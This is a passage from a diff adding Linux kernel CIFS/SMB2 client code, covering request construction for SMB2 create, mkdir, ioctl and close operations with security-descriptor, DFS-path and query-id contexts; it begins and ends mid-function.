++	buf->sd.Revision = 1;  /* Must be one see MS-DTYP 2.4.6 */
++
++	/*
++	 * ACL is "self relative" ie ACL is stored in contiguous block of memory
++	 * and "DP" ie the DACL is present
++	 */
++	buf->sd.Control = cpu_to_le16(ACL_CONTROL_SR | ACL_CONTROL_DP);
++
++	/* offset owner, group and Sbz1 and SACL are all zero */
++	buf->sd.OffsetDacl = cpu_to_le32(ptr - (__u8 *)&buf->sd);
++	/* Ship the ACL for now. we will copy it into buf later. */
++	aclptr = ptr;
++	ptr += sizeof(struct smb3_acl);
++
++	/* create one ACE to hold the mode embedded in reserved special SID */
++	acelen = setup_special_mode_ACE((struct cifs_ace *)ptr, (__u64)mode);
++	ptr += acelen;
++	acl_size = acelen + sizeof(struct smb3_acl);
++	ace_count = 1;
++
++	if (set_owner) {
++		/* we do not need to reallocate buffer to add the two more ACEs. plenty of space */
++		acelen = setup_special_user_owner_ACE((struct cifs_ace *)ptr);
++		ptr += acelen;
++		acl_size += acelen;
++		ace_count += 1;
++	}
++
++	/* and one more ACE to allow access for authenticated users */
++	acelen = setup_authusers_ACE((struct cifs_ace *)ptr);
++	ptr += acelen;
++	acl_size += acelen;
++	ace_count += 1;
++
++	acl.AclRevision = ACL_REVISION; /* See 2.4.4.1 of MS-DTYP */
++	acl.AclSize = cpu_to_le16(acl_size);
++	acl.AceCount = cpu_to_le16(ace_count);
++	/* acl.Sbz1 and Sbz2 MBZ so are not set here, but initialized above */
++	memcpy(aclptr, &acl, sizeof(struct smb3_acl));
++
++	buf->ccontext.DataLength = cpu_to_le32(ptr - (__u8 *)&buf->sd);
++	*len = round_up((unsigned int)(ptr - (__u8 *)buf), 8);
++
++	return buf;
++}
++
++static int
++add_sd_context(struct kvec *iov, unsigned int *num_iovec, umode_t mode, bool set_owner)
++{
++	struct smb2_create_req *req = iov[0].iov_base;
++	unsigned int num = *num_iovec;
++	unsigned int len = 0;
++
++	iov[num].iov_base = create_sd_buf(mode, set_owner, &len);
++	if (iov[num].iov_base == NULL)
++		return -ENOMEM;
++	iov[num].iov_len = len;
++	if (!req->CreateContextsOffset)
++		req->CreateContextsOffset = cpu_to_le32(
++				sizeof(struct smb2_create_req) +
++				iov[num - 1].iov_len);
++	le32_add_cpu(&req->CreateContextsLength, len);
++	*num_iovec = num + 1;
++	return 0;
++}
++
++static struct crt_query_id_ctxt *
++create_query_id_buf(void)
++{
++	struct crt_query_id_ctxt *buf;
++
++	buf = kzalloc(sizeof(struct crt_query_id_ctxt), GFP_KERNEL);
++	if (!buf)
++		return NULL;
++
++	buf->ccontext.DataOffset = cpu_to_le16(0);
++	buf->ccontext.DataLength = cpu_to_le32(0);
++	buf->ccontext.NameOffset = cpu_to_le16(offsetof
++				(struct crt_query_id_ctxt, Name));
++	buf->ccontext.NameLength = cpu_to_le16(4);
++	/* SMB2_CREATE_QUERY_ON_DISK_ID is "QFid" */
++	buf->Name[0] = 'Q';
++	buf->Name[1] = 'F';
++	buf->Name[2] = 'i';
++	buf->Name[3] = 'd';
++	return buf;
++}
++
++/* See MS-SMB2 2.2.13.2.9 */
++static int
++add_query_id_context(struct kvec *iov, unsigned int *num_iovec)
++{
++	struct smb2_create_req *req = iov[0].iov_base;
++	unsigned int num = *num_iovec;
++
++	iov[num].iov_base = create_query_id_buf();
++	if (iov[num].iov_base == NULL)
++		return -ENOMEM;
++	iov[num].iov_len = sizeof(struct crt_query_id_ctxt);
++	if (!req->CreateContextsOffset)
++		req->CreateContextsOffset = cpu_to_le32(
++				sizeof(struct smb2_create_req) +
++				iov[num - 1].iov_len);
++	le32_add_cpu(&req->CreateContextsLength, sizeof(struct crt_query_id_ctxt));
++	*num_iovec = num + 1;
++	return 0;
++}
++
++static int
++alloc_path_with_tree_prefix(__le16 **out_path, int *out_size, int *out_len,
++			    const char *treename, const __le16 *path)
++{
++	int treename_len, path_len;
++	struct nls_table *cp;
++	const __le16 sep[] = {cpu_to_le16('\\'), cpu_to_le16(0x0000)};
++
++	/*
++	 * skip leading "\\"
++	 */
++	treename_len = strlen(treename);
++	if (treename_len < 2 || !(treename[0] == '\\' && treename[1] == '\\'))
++		return -EINVAL;
++
++	treename += 2;
++	treename_len -= 2;
++
++	path_len = UniStrnlen((wchar_t *)path, PATH_MAX);
++
++	/* make room for one path separator only if @path isn't empty */
++	*out_len = treename_len + (path[0] ? 1 : 0) + path_len;
++
++	/*
++	 * final path needs to be 8-byte aligned as specified in
++	 * MS-SMB2 2.2.13 SMB2 CREATE Request.
++	 */
++	*out_size = round_up(*out_len * sizeof(__le16), 8);
++	*out_path = kzalloc(*out_size + sizeof(__le16) /* null */, GFP_KERNEL);
++	if (!*out_path)
++		return -ENOMEM;
++
++	cp = load_nls_default();
++	cifs_strtoUTF16(*out_path, treename, treename_len, cp);
++
++	/* Do not append the separator if the path is empty */
++	if (path[0] != cpu_to_le16(0x0000)) {
++		UniStrcat(*out_path, sep);
++		UniStrcat(*out_path, path);
++	}
++
++	unload_nls(cp);
++
++	return 0;
++}
++
++int smb311_posix_mkdir(const unsigned int xid, struct inode *inode,
++			       umode_t mode, struct cifs_tcon *tcon,
++			       const char *full_path,
++			       struct cifs_sb_info *cifs_sb)
++{
++	struct smb_rqst rqst;
++	struct smb2_create_req *req;
++	struct smb2_create_rsp *rsp = NULL;
++	struct cifs_ses *ses = tcon->ses;
++	struct kvec iov[3]; /* make sure at least one for each open context */
++	struct kvec rsp_iov = {NULL, 0};
++	int resp_buftype;
++	int uni_path_len;
++	__le16 *copy_path = NULL;
++	int copy_size;
++	int rc = 0;
++	unsigned int n_iov = 2;
++	__u32 file_attributes = 0;
++	char *pc_buf = NULL;
++	int flags = 0;
++	unsigned int total_len;
++	__le16 *utf16_path = NULL;
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++
++	cifs_dbg(FYI, "mkdir\n");
++
++	/* resource #1: path allocation */
++	utf16_path = cifs_convert_path_to_utf16(full_path, cifs_sb);
++	if (!utf16_path)
++		return -ENOMEM;
++
++	if (!ses || !server) {
++		rc = -EIO;
++		goto err_free_path;
++	}
++
++	/* resource #2: request */
++	rc = smb2_plain_req_init(SMB2_CREATE, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		goto err_free_path;
++
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	req->ImpersonationLevel = IL_IMPERSONATION;
++	req->DesiredAccess = cpu_to_le32(FILE_WRITE_ATTRIBUTES);
++	/* File attributes ignored on open (used in create though) */
++	req->FileAttributes = cpu_to_le32(file_attributes);
++	req->ShareAccess = FILE_SHARE_ALL_LE;
++	req->CreateDisposition = cpu_to_le32(FILE_CREATE);
++	req->CreateOptions = cpu_to_le32(CREATE_NOT_FILE);
++
++	iov[0].iov_base = (char *)req;
++	/* -1 since last byte is buf[0] which is sent below (path) */
++	iov[0].iov_len = total_len - 1;
++
++	req->NameOffset = cpu_to_le16(sizeof(struct smb2_create_req));
++
++	/* [MS-SMB2] 2.2.13 NameOffset:
++	 * If SMB2_FLAGS_DFS_OPERATIONS is set in the Flags field of
++	 * the SMB2 header, the file name includes a prefix that will
++	 * be processed during DFS name normalization as specified in
++	 * section 3.3.5.9. Otherwise, the file name is relative to
++	 * the share that is identified by the TreeId in the SMB2
++	 * header.
++	 */
++	if (tcon->share_flags & SHI1005_FLAGS_DFS) {
++		int name_len;
++
++		req->hdr.Flags |= SMB2_FLAGS_DFS_OPERATIONS;
++		rc = alloc_path_with_tree_prefix(&copy_path, &copy_size,
++						 &name_len,
++						 tcon->tree_name, utf16_path);
++		if (rc)
++			goto err_free_req;
++
++		req->NameLength = cpu_to_le16(name_len * 2);
++		uni_path_len = copy_size;
++		/* free before overwriting resource */
++		kfree(utf16_path);
++		utf16_path = copy_path;
++	} else {
++		uni_path_len = (2 * UniStrnlen((wchar_t *)utf16_path, PATH_MAX)) + 2;
++		/* MUST set path len (NameLength) to 0 opening root of share */
++		req->NameLength = cpu_to_le16(uni_path_len - 2);
++		if (uni_path_len % 8 != 0) {
++			copy_size = roundup(uni_path_len, 8);
++			copy_path = kzalloc(copy_size, GFP_KERNEL);
++			if (!copy_path) {
++				rc = -ENOMEM;
++				goto err_free_req;
++			}
++			memcpy((char *)copy_path, (const char *)utf16_path,
++			       uni_path_len);
++			uni_path_len = copy_size;
++			/* free before overwriting resource */
++			kfree(utf16_path);
++			utf16_path = copy_path;
++		}
++	}
++
++	iov[1].iov_len = uni_path_len;
++	iov[1].iov_base = utf16_path;
++	req->RequestedOplockLevel = SMB2_OPLOCK_LEVEL_NONE;
++
++	if (tcon->posix_extensions) {
++		/* resource #3: posix buf */
++		rc = add_posix_context(iov, &n_iov, mode);
++		if (rc)
++			goto err_free_req;
++		pc_buf = iov[n_iov-1].iov_base;
++	}
++
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = n_iov;
++
++	/* no need to inc num_remote_opens because we close it just below */
++	trace_smb3_posix_mkdir_enter(xid, tcon->tid, ses->Suid, full_path, CREATE_NOT_FILE,
++				    FILE_WRITE_ATTRIBUTES);
++	/* resource #4: response buffer */
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags, &rsp_iov);
++	if (rc) {
++		cifs_stats_fail_inc(tcon, SMB2_CREATE_HE);
++		trace_smb3_posix_mkdir_err(xid, tcon->tid, ses->Suid,
++					   CREATE_NOT_FILE,
++					   FILE_WRITE_ATTRIBUTES, rc);
++		goto err_free_rsp_buf;
++	}
++
++	/*
++	 * Although unlikely to be possible for rsp to be null and rc not set,
++	 * adding check below is slightly safer long term (and quiets Coverity
++	 * warning)
++	 */
++	rsp = (struct smb2_create_rsp *)rsp_iov.iov_base;
++	if (rsp == NULL) {
++		rc = -EIO;
++		kfree(pc_buf);
++		goto err_free_req;
++	}
++
++	trace_smb3_posix_mkdir_done(xid, rsp->PersistentFileId, tcon->tid, ses->Suid,
++				    CREATE_NOT_FILE, FILE_WRITE_ATTRIBUTES);
++
++	SMB2_close(xid, tcon, rsp->PersistentFileId, rsp->VolatileFileId);
++
++	/* Eventually save off posix specific response info and timestaps */
++
++err_free_rsp_buf:
++	free_rsp_buf(resp_buftype, rsp);
++	kfree(pc_buf);
++err_free_req:
++	cifs_small_buf_release(req);
++err_free_path:
++	kfree(utf16_path);
++	return rc;
++}
++
++int
++SMB2_open_init(struct cifs_tcon *tcon, struct TCP_Server_Info *server,
++	       struct smb_rqst *rqst, __u8 *oplock,
++	       struct cifs_open_parms *oparms, __le16 *path)
++{
++	struct smb2_create_req *req;
++	unsigned int n_iov = 2;
++	__u32 file_attributes = 0;
++	int copy_size;
++	int uni_path_len;
++	unsigned int total_len;
++	struct kvec *iov = rqst->rq_iov;
++	__le16 *copy_path;
++	int rc;
++
++	rc = smb2_plain_req_init(SMB2_CREATE, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	iov[0].iov_base = (char *)req;
++	/* -1 since last byte is buf[0] which is sent below (path) */
++	iov[0].iov_len = total_len - 1;
++
++	if (oparms->create_options & CREATE_OPTION_READONLY)
++		file_attributes |= ATTR_READONLY;
++	if (oparms->create_options & CREATE_OPTION_SPECIAL)
++		file_attributes |= ATTR_SYSTEM;
++
++	req->ImpersonationLevel = IL_IMPERSONATION;
++	req->DesiredAccess = cpu_to_le32(oparms->desired_access);
++	/* File attributes ignored on open (used in create though) */
++	req->FileAttributes = cpu_to_le32(file_attributes);
++	req->ShareAccess = FILE_SHARE_ALL_LE;
++
++	req->CreateDisposition = cpu_to_le32(oparms->disposition);
++	req->CreateOptions = cpu_to_le32(oparms->create_options & CREATE_OPTIONS_MASK);
++	req->NameOffset = cpu_to_le16(sizeof(struct smb2_create_req));
++
++	/* [MS-SMB2] 2.2.13 NameOffset:
++	 * If SMB2_FLAGS_DFS_OPERATIONS is set in the Flags field of
++	 * the SMB2 header, the file name includes a prefix that will
++	 * be processed during DFS name normalization as specified in
++	 * section 3.3.5.9. Otherwise, the file name is relative to
++	 * the share that is identified by the TreeId in the SMB2
++	 * header.
++	 */
++	if (tcon->share_flags & SHI1005_FLAGS_DFS) {
++		int name_len;
++
++		req->hdr.Flags |= SMB2_FLAGS_DFS_OPERATIONS;
++		rc = alloc_path_with_tree_prefix(&copy_path, &copy_size,
++						 &name_len,
++						 tcon->tree_name, path);
++		if (rc)
++			return rc;
++		req->NameLength = cpu_to_le16(name_len * 2);
++		uni_path_len = copy_size;
++		path = copy_path;
++	} else {
++		uni_path_len = (2 * UniStrnlen((wchar_t *)path, PATH_MAX)) + 2;
++		/* MUST set path len (NameLength) to 0 opening root of share */
++		req->NameLength = cpu_to_le16(uni_path_len - 2);
++		copy_size = round_up(uni_path_len, 8);
++		copy_path = kzalloc(copy_size, GFP_KERNEL);
++		if (!copy_path)
++			return -ENOMEM;
++		memcpy((char *)copy_path, (const char *)path,
++		       uni_path_len);
++		uni_path_len = copy_size;
++		path = copy_path;
++	}
++
++	iov[1].iov_len = uni_path_len;
++	iov[1].iov_base = path;
++
++	if ((!server->oplocks) || (tcon->no_lease))
++		*oplock = SMB2_OPLOCK_LEVEL_NONE;
++
++	if (!(server->capabilities & SMB2_GLOBAL_CAP_LEASING) ||
++	    *oplock == SMB2_OPLOCK_LEVEL_NONE)
++		req->RequestedOplockLevel = *oplock;
++	else if (!(server->capabilities & SMB2_GLOBAL_CAP_DIRECTORY_LEASING) &&
++		  (oparms->create_options & CREATE_NOT_FILE))
++		req->RequestedOplockLevel = *oplock; /* no srv lease support */
++	else {
++		rc = add_lease_context(server, iov, &n_iov,
++				       oparms->fid->lease_key, oplock);
++		if (rc)
++			return rc;
++	}
++
++	if (*oplock == SMB2_OPLOCK_LEVEL_BATCH) {
++		/* need to set Next field of lease context if we request it */
++		if (server->capabilities & SMB2_GLOBAL_CAP_LEASING) {
++			struct create_context *ccontext =
++			    (struct create_context *)iov[n_iov-1].iov_base;
++			ccontext->Next =
++				cpu_to_le32(server->vals->create_lease_size);
++		}
++
++		rc = add_durable_context(iov, &n_iov, oparms,
++					tcon->use_persistent);
++		if (rc)
++			return rc;
++	}
++
++	if (tcon->posix_extensions) {
++		if (n_iov > 2) {
++			struct create_context *ccontext =
++			    (struct create_context *)iov[n_iov-1].iov_base;
++			ccontext->Next =
++				cpu_to_le32(iov[n_iov-1].iov_len);
++		}
++
++		rc = add_posix_context(iov, &n_iov, oparms->mode);
++		if (rc)
++			return rc;
++	}
++
++	if (tcon->snapshot_time) {
++		cifs_dbg(FYI, "adding snapshot context\n");
++		if (n_iov > 2) {
++			struct create_context *ccontext =
++			    (struct create_context *)iov[n_iov-1].iov_base;
++			ccontext->Next =
++				cpu_to_le32(iov[n_iov-1].iov_len);
++		}
++
++		rc = add_twarp_context(iov, &n_iov, tcon->snapshot_time);
++		if (rc)
++			return rc;
++	}
++
++	if ((oparms->disposition != FILE_OPEN) && (oparms->cifs_sb)) {
++		bool set_mode;
++		bool set_owner;
++
++		if ((oparms->cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID) &&
++		    (oparms->mode != ACL_NO_MODE))
++			set_mode = true;
++		else {
++			set_mode = false;
++			oparms->mode = ACL_NO_MODE;
++		}
++
++		if (oparms->cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UID_FROM_ACL)
++			set_owner = true;
++		else
++			set_owner = false;
++
++		if (set_owner | set_mode) {
++			if (n_iov > 2) {
++				struct create_context *ccontext =
++				    (struct create_context *)iov[n_iov-1].iov_base;
++				ccontext->Next = cpu_to_le32(iov[n_iov-1].iov_len);
++			}
++
++			cifs_dbg(FYI, "add sd with mode 0x%x\n", oparms->mode);
++			rc = add_sd_context(iov, &n_iov, oparms->mode, set_owner);
++			if (rc)
++				return rc;
++		}
++	}
++
++	if (n_iov > 2) {
++		struct create_context *ccontext =
++			(struct create_context *)iov[n_iov-1].iov_base;
++		ccontext->Next = cpu_to_le32(iov[n_iov-1].iov_len);
++	}
++	add_query_id_context(iov, &n_iov);
++
++	rqst->rq_nvec = n_iov;
++	return 0;
++}
++
++/* rq_iov[0] is the request and is released by cifs_small_buf_release().
++ * All other vectors are freed by kfree().
++ */
++void
++SMB2_open_free(struct smb_rqst *rqst)
++{
++	int i;
++
++	if (rqst && rqst->rq_iov) {
++		cifs_small_buf_release(rqst->rq_iov[0].iov_base);
++		for (i = 1; i < rqst->rq_nvec; i++)
++			if (rqst->rq_iov[i].iov_base != smb2_padding)
++				kfree(rqst->rq_iov[i].iov_base);
++	}
++}
++
++int
++SMB2_open(const unsigned int xid, struct cifs_open_parms *oparms, __le16 *path,
++	  __u8 *oplock, struct smb2_file_all_info *buf,
++	  struct create_posix_rsp *posix,
++	  struct kvec *err_iov, int *buftype)
++{
++	struct smb_rqst rqst;
++	struct smb2_create_rsp *rsp = NULL;
++	struct cifs_tcon *tcon = oparms->tcon;
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++	struct kvec iov[SMB2_CREATE_IOV_SIZE];
++	struct kvec rsp_iov = {NULL, 0};
++	int resp_buftype = CIFS_NO_BUFFER;
++	int rc = 0;
++	int flags = 0;
++
++	cifs_dbg(FYI, "create/open\n");
++	if (!ses || !server)
++		return -EIO;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	memset(&iov, 0, sizeof(iov));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = SMB2_CREATE_IOV_SIZE;
++
++	rc = SMB2_open_init(tcon, server,
++			    &rqst, oplock, oparms, path);
++	if (rc)
++		goto creat_exit;
++
++	trace_smb3_open_enter(xid, tcon->tid, tcon->ses->Suid, oparms->path,
++		oparms->create_options, oparms->desired_access);
++
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags,
++			    &rsp_iov);
++	rsp = (struct smb2_create_rsp *)rsp_iov.iov_base;
++
++	if (rc != 0) {
++		cifs_stats_fail_inc(tcon, SMB2_CREATE_HE);
++		if (err_iov && rsp) {
++			*err_iov = rsp_iov;
++			*buftype = resp_buftype;
++			resp_buftype = CIFS_NO_BUFFER;
++			rsp = NULL;
++		}
++		trace_smb3_open_err(xid, tcon->tid, ses->Suid,
++				    oparms->create_options, oparms->desired_access, rc);
++		if (rc == -EREMCHG) {
++			pr_warn_once("server share %s deleted\n",
++				     tcon->tree_name);
++			tcon->need_reconnect = true;
++		}
++		goto creat_exit;
++	} else if (rsp == NULL) /* unlikely to happen, but safer to check */
++		goto creat_exit;
++	else
++		trace_smb3_open_done(xid, rsp->PersistentFileId, tcon->tid, ses->Suid,
++				     oparms->create_options, oparms->desired_access);
++
++	atomic_inc(&tcon->num_remote_opens);
++	oparms->fid->persistent_fid = rsp->PersistentFileId;
++	oparms->fid->volatile_fid = rsp->VolatileFileId;
++	oparms->fid->access = oparms->desired_access;
++#ifdef CONFIG_CIFS_DEBUG2
++	oparms->fid->mid = le64_to_cpu(rsp->hdr.MessageId);
++#endif /* CIFS_DEBUG2 */
++
++	if (buf) {
++		buf->CreationTime = rsp->CreationTime;
++		buf->LastAccessTime = rsp->LastAccessTime;
++		buf->LastWriteTime = rsp->LastWriteTime;
++		buf->ChangeTime = rsp->ChangeTime;
++		buf->AllocationSize = rsp->AllocationSize;
++		buf->EndOfFile = rsp->EndofFile;
++		buf->Attributes = rsp->FileAttributes;
++		buf->NumberOfLinks = cpu_to_le32(1);
++		buf->DeletePending = 0;
++	}
++
++
++	smb2_parse_contexts(server, rsp, &oparms->fid->epoch,
++			    oparms->fid->lease_key, oplock, buf, posix);
++creat_exit:
++	SMB2_open_free(&rqst);
++	free_rsp_buf(resp_buftype, rsp);
++	return rc;
++}
++
++int
++SMB2_ioctl_init(struct cifs_tcon *tcon, struct TCP_Server_Info *server,
++		struct smb_rqst *rqst,
++		u64 persistent_fid, u64 volatile_fid, u32 opcode,
++		char *in_data, u32 indatalen,
++		__u32 max_response_size)
++{
++	struct smb2_ioctl_req *req;
++	struct kvec *iov = rqst->rq_iov;
++	unsigned int total_len;
++	int rc;
++	char *in_data_buf;
++
++	rc = smb2_ioctl_req_init(opcode, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	if (indatalen) {
++		/*
++		 * indatalen is usually small at a couple of bytes max, so
++		 * just allocate through generic pool
++		 */
++		in_data_buf = kmemdup(in_data, indatalen, GFP_NOFS);
++		if (!in_data_buf) {
++			cifs_small_buf_release(req);
++			return -ENOMEM;
++		}
++	}
++
++	req->CtlCode = cpu_to_le32(opcode);
++	req->PersistentFileId = persistent_fid;
++	req->VolatileFileId = volatile_fid;
++
++	iov[0].iov_base = (char *)req;
++	/*
++	 * If no input data, the size of ioctl struct in
++	 * protocol spec still includes a 1 byte data buffer,
++	 * but if input data passed to ioctl, we do not
++	 * want to double count this, so we do not send
++	 * the dummy one byte of data in iovec[0] if sending
++	 * input data (in iovec[1]).
++	 */
++	if (indatalen) {
++		req->InputCount = cpu_to_le32(indatalen);
++		/* do not set InputOffset if no input data */
++		req->InputOffset =
++		       cpu_to_le32(offsetof(struct smb2_ioctl_req, Buffer));
++		rqst->rq_nvec = 2;
++		iov[0].iov_len = total_len - 1;
++		iov[1].iov_base = in_data_buf;
++		iov[1].iov_len = indatalen;
++	} else {
++		rqst->rq_nvec = 1;
++		iov[0].iov_len = total_len;
++	}
++
++	req->OutputOffset = 0;
++	req->OutputCount = 0; /* MBZ */
++
++	/*
++	 * In most cases max_response_size is set to 16K (CIFSMaxBufSize)
++	 * We Could increase default MaxOutputResponse, but that could require
++	 * more credits. Windows typically sets this smaller, but for some
++	 * ioctls it may be useful to allow server to send more. No point
++	 * limiting what the server can send as long as fits in one credit
++	 * We can not handle more than CIFS_MAX_BUF_SIZE yet but may want
++	 * to increase this limit up in the future.
++	 * Note that for snapshot queries that servers like Azure expect that
++	 * the first query be minimal size (and just used to get the number/size
++	 * of previous versions) so response size must be specified as EXACTLY
++	 * sizeof(struct snapshot_array) which is 16 when rounded up to multiple
++	 * of eight bytes.  Currently that is the only case where we set max
++	 * response size smaller.
++	 */
++	req->MaxOutputResponse = cpu_to_le32(max_response_size);
++	req->hdr.CreditCharge =
++		cpu_to_le16(DIV_ROUND_UP(max(indatalen, max_response_size),
++					 SMB2_MAX_BUFFER_SIZE));
++	/* always an FSCTL (for now) */
++	req->Flags = cpu_to_le32(SMB2_0_IOCTL_IS_FSCTL);
++
++	/* validate negotiate request must be signed - see MS-SMB2 3.2.5.5 */
++	if (opcode == FSCTL_VALIDATE_NEGOTIATE_INFO)
++		req->hdr.Flags |= SMB2_FLAGS_SIGNED;
++
++	return 0;
++}
++
++void
++SMB2_ioctl_free(struct smb_rqst *rqst)
++{
++	int i;
++	if (rqst && rqst->rq_iov) {
++		cifs_small_buf_release(rqst->rq_iov[0].iov_base); /* request */
++		for (i = 1; i < rqst->rq_nvec; i++)
++			if (rqst->rq_iov[i].iov_base != smb2_padding)
++				kfree(rqst->rq_iov[i].iov_base);
++	}
++}
++
++
++/*
++ *	SMB2 IOCTL is used for both IOCTLs and FSCTLs
++ */
++int
++SMB2_ioctl(const unsigned int xid, struct cifs_tcon *tcon, u64 persistent_fid,
++	   u64 volatile_fid, u32 opcode, char *in_data, u32 indatalen,
++	   u32 max_out_data_len, char **out_data,
++	   u32 *plen /* returned data len */)
++{
++	struct smb_rqst rqst;
++	struct smb2_ioctl_rsp *rsp = NULL;
++	struct cifs_ses *ses;
++	struct TCP_Server_Info *server;
++	struct kvec iov[SMB2_IOCTL_IOV_SIZE];
++	struct kvec rsp_iov = {NULL, 0};
++	int resp_buftype = CIFS_NO_BUFFER;
++	int rc = 0;
++	int flags = 0;
++
++	cifs_dbg(FYI, "SMB2 IOCTL\n");
++
++	if (out_data != NULL)
++		*out_data = NULL;
++
++	/* zero out returned data len, in case of error */
++	if (plen)
++		*plen = 0;
++
++	if (!tcon)
++		return -EIO;
++
++	ses = tcon->ses;
++	if (!ses)
++		return -EIO;
++
++	server = cifs_pick_channel(ses);
++	if (!server)
++		return -EIO;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	memset(&iov, 0, sizeof(iov));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = SMB2_IOCTL_IOV_SIZE;
++
++	rc = SMB2_ioctl_init(tcon, server,
++			     &rqst, persistent_fid, volatile_fid, opcode,
++			     in_data, indatalen, max_out_data_len);
++	if (rc)
++		goto ioctl_exit;
++
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags,
++			    &rsp_iov);
++	rsp = (struct smb2_ioctl_rsp *)rsp_iov.iov_base;
++
++	if (rc != 0)
++		trace_smb3_fsctl_err(xid, persistent_fid, tcon->tid,
++				ses->Suid, 0, opcode, rc);
++
++	if ((rc != 0) && (rc != -EINVAL) && (rc != -E2BIG)) {
++		cifs_stats_fail_inc(tcon, SMB2_IOCTL_HE);
++		goto ioctl_exit;
++	} else if (rc == -EINVAL) {
++		if ((opcode != FSCTL_SRV_COPYCHUNK_WRITE) &&
++		    (opcode != FSCTL_SRV_COPYCHUNK)) {
++			cifs_stats_fail_inc(tcon, SMB2_IOCTL_HE);
++			goto ioctl_exit;
++		}
++	} else if (rc == -E2BIG) {
++		if (opcode != FSCTL_QUERY_ALLOCATED_RANGES) {
++			cifs_stats_fail_inc(tcon, SMB2_IOCTL_HE);
++			goto ioctl_exit;
++		}
++	}
++
++	/* check if caller wants to look at return data or just return rc */
++	if ((plen == NULL) || (out_data == NULL))
++		goto ioctl_exit;
++
++	/*
++	 * Although unlikely to be possible for rsp to be null and rc not set,
++	 * adding check below is slightly safer long term (and quiets Coverity
++	 * warning)
++	 */
++	if (rsp == NULL) {
++		rc = -EIO;
++		goto ioctl_exit;
++	}
++
++	*plen = le32_to_cpu(rsp->OutputCount);
++
++	/* We check for obvious errors in the output buffer length and offset */
++	if (*plen == 0)
++		goto ioctl_exit; /* server returned no data */
++	else if (*plen > rsp_iov.iov_len || *plen > 0xFF00) {
++		cifs_tcon_dbg(VFS, "srv returned invalid ioctl length: %d\n", *plen);
++		*plen = 0;
++		rc = -EIO;
++		goto ioctl_exit;
++	}
++
++	if (rsp_iov.iov_len - *plen < le32_to_cpu(rsp->OutputOffset)) {
++		cifs_tcon_dbg(VFS, "Malformed ioctl resp: len %d offset %d\n", *plen,
++			le32_to_cpu(rsp->OutputOffset));
++		*plen = 0;
++		rc = -EIO;
++		goto ioctl_exit;
++	}
++
++	*out_data = kmemdup((char *)rsp + le32_to_cpu(rsp->OutputOffset),
++			    *plen, GFP_KERNEL);
++	if (*out_data == NULL) {
++		rc = -ENOMEM;
++		goto ioctl_exit;
++	}
++
++ioctl_exit:
++	SMB2_ioctl_free(&rqst);
++	free_rsp_buf(resp_buftype, rsp);
++	return rc;
++}
++
++/*
++ *   Individual callers to ioctl worker function follow
++ */
++
++int
++SMB2_set_compression(const unsigned int xid, struct cifs_tcon *tcon,
++		     u64 persistent_fid, u64 volatile_fid)
++{
++	int rc;
++	struct  compress_ioctl fsctl_input;
++	char *ret_data = NULL;
++
++	fsctl_input.CompressionState =
++			cpu_to_le16(COMPRESSION_FORMAT_DEFAULT);
++
++	rc = SMB2_ioctl(xid, tcon, persistent_fid, volatile_fid,
++			FSCTL_SET_COMPRESSION,
++			(char *)&fsctl_input /* data input */,
++			2 /* in data len */, CIFSMaxBufSize /* max out data */,
++			&ret_data /* out data */, NULL);
++
++	cifs_dbg(FYI, "set compression rc %d\n", rc);
++
++	return rc;
++}
++
++int
++SMB2_close_init(struct cifs_tcon *tcon, struct TCP_Server_Info *server,
++		struct smb_rqst *rqst,
++		u64 persistent_fid, u64 volatile_fid, bool query_attrs)
++{
++	struct smb2_close_req *req;
++	struct kvec *iov = rqst->rq_iov;
++	unsigned int total_len;
++	int rc;
++
++	rc = smb2_plain_req_init(SMB2_CLOSE, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	req->PersistentFileId = persistent_fid;
++	req->VolatileFileId = volatile_fid;
++	if (query_attrs)
++		req->Flags = SMB2_CLOSE_FLAG_POSTQUERY_ATTRIB;
++	else
++		req->Flags = 0;
++	iov[0].iov_base = (char *)req;
++	iov[0].iov_len = total_len;
++
++	return 0;
++}
++
++void
++SMB2_close_free(struct smb_rqst *rqst)
++{
++	if (rqst && rqst->rq_iov)
++		cifs_small_buf_release(rqst->rq_iov[0].iov_base); /* request */
++}
++
++int
++__SMB2_close(const unsigned int xid, struct cifs_tcon *tcon,
++	     u64 persistent_fid, u64 volatile_fid,
++	     struct smb2_file_network_open_info *pbuf)
++{
++	struct smb_rqst rqst;
++	struct smb2_close_rsp *rsp = NULL;
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++	struct kvec iov[1];
++	struct kvec rsp_iov;
++	int resp_buftype = CIFS_NO_BUFFER;
++	int rc = 0;
++	int flags = 0;
++	bool query_attrs = false;
++
++	cifs_dbg(FYI, "Close\n");
++
++	if (!ses || !server)
++		return -EIO;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	memset(&iov, 0, sizeof(iov));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 1;
++
++	/* check if need to ask server to return timestamps in close response */
++	if (pbuf)
++		query_attrs = true;
++
++	trace_smb3_close_enter(xid, persistent_fid, tcon->tid, ses->Suid);
++	rc = SMB2_close_init(tcon, server,
